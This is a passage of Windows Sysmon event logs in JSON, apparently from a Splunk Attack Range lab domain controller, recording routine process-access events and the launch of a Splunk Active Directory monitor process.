{"EventTime":"2020-08-01 07:59:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5934,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:40.644\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:40.644","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5935,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:40.644\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:40.644","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5936,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:40.644\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:40.644","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5937,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:40.644\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:40.644","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5938,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:40.644\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:40.644","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5939,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:40.644\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20EC-5F25-0000-0010FF420900}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:40.644","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20EC-5F25-0000-0010FF420900}","TargetProcessId":"4612","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5940,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.379\r\nProcessGuid: {41C8662E-20ED-5F25-0000-0010A6440900}\r\nProcessId: 1212\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.379","ProcessGuid":"{41C8662E-20ED-5F25-0000-0010A6440900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5941,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.378\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-20ED-5F25-0000-0010A6440900}\r\nTargetProcessId: 1212\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.378","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-20ED-5F25-0000-0010A6440900}","TargetProcessId":"1212","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5942,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.378\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20ED-5F25-0000-0010A6440900}\r\nTargetProcessId: 1212\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 